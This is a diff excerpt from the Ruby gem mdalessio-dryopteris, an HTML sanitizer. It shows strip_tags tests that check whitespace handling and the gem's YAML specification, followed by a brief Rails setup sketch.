+ HTML
21
+ stripped = Dryopteris.strip_tags(html)
22
+ assert_equal "What's up doc?".strip, stripped.strip
23
+ end
24
+
25
+ def test_dont_remove_whitespace
26
+ html = "Foo\nBar"
27
+ assert_equal html, Dryopteris.strip_tags(html)
28
+ end
29
+
30
+ def test_dont_remove_whitespace_between_tags
31
+ html = "<p>Foo</p>\n<p>Bar</p>"
32
+ assert_equal "Foo\nBar", Dryopteris.strip_tags(html)
33
+ end
34
+
35
+ end
metadata ADDED
@@ -0,0 +1,75 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: mdalessio-dryopteris
3
+ version: !ruby/object:Gem::Version
4
+ version: 0.1.0
5
+ platform: ruby
6
+ authors:
7
+ - Bryan Helmkamp
8
+ - Mike Dalessio
9
+ autorequire:
10
+ bindir: bin
11
+ cert_chain: []
12
+
13
+ date: 2009-02-10 00:00:00 -08:00
14
+ default_executable:
15
+ dependencies:
16
+ - !ruby/object:Gem::Dependency
17
+ name: nokogiri
18
+ version_requirement:
19
+ version_requirements: !ruby/object:Gem::Requirement
20
+ requirements:
21
+ - - ">"
22
+ - !ruby/object:Gem::Version
23
+ version: 0.0.0
24
+ version:
25
+ description: Dryopteris erythrosora is the Japanese Shield Fern. It also can be used to sanitize HTML to help prevent XSS attacks.
26
+ email:
27
+ - bryan@brynary.com
28
+ - mike.dalessio@gmail.com
29
+ executables: []
30
+
31
+ extensions: []
32
+
33
+ extra_rdoc_files: []
34
+
35
+ files:
36
+ - README.markdown
37
+ - VERSION.yml
38
+ - lib/dryopteris
39
+ - lib/dryopteris/rails_extension.rb
40
+ - lib/dryopteris/sanitize.rb
41
+ - lib/dryopteris/whitelist.rb
42
+ - lib/dryopteris.rb
43
+ - test/test_basic.rb
44
+ - test/test_strip_tags.rb
45
+ - test/helper.rb
46
+ - test/test_sanitizer.rb
47
+ has_rdoc: true
48
+ homepage: http://github.com/brynary/dryopteris/tree/master
49
+ post_install_message:
50
+ rdoc_options:
51
+ - --inline-source
52
+ - --charset=UTF-8
53
+ require_paths:
54
+ - lib
55
+ required_ruby_version: !ruby/object:Gem::Requirement
56
+ requirements:
57
+ - - ">="
58
+ - !ruby/object:Gem::Version
59
+ version: "0"
60
+ version:
61
+ required_rubygems_version: !ruby/object:Gem::Requirement
62
+ requirements:
63
+ - - ">="
64
+ - !ruby/object:Gem::Version
65
+ version: "0"
66
+ version:
67
+ requirements: []
68
+
69
+ rubyforge_project:
70
+ rubygems_version: 1.2.0
71
+ signing_key:
72
+ specification_version: 2
73
+ summary: HTML sanitization using Nokogiri
74
+ test_files: []
75
+
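For context, a hedged sketch of pulling this gem into a Rails 2.x application of the same era. The gems.github.com source reflects how username-prefixed GitHub-built gems such as mdalessio-dryopteris were generally installed at the time; treat the exact setup as an assumption rather than documented instructions.

    # config/environment.rb (Rails 2.x) -- hypothetical setup
    config.gem "mdalessio-dryopteris", :lib => "dryopteris",
               :source => "http://gems.github.com"

    # later, in a controller
    require "dryopteris"
    safe = Dryopteris.sanitize(params[:comment])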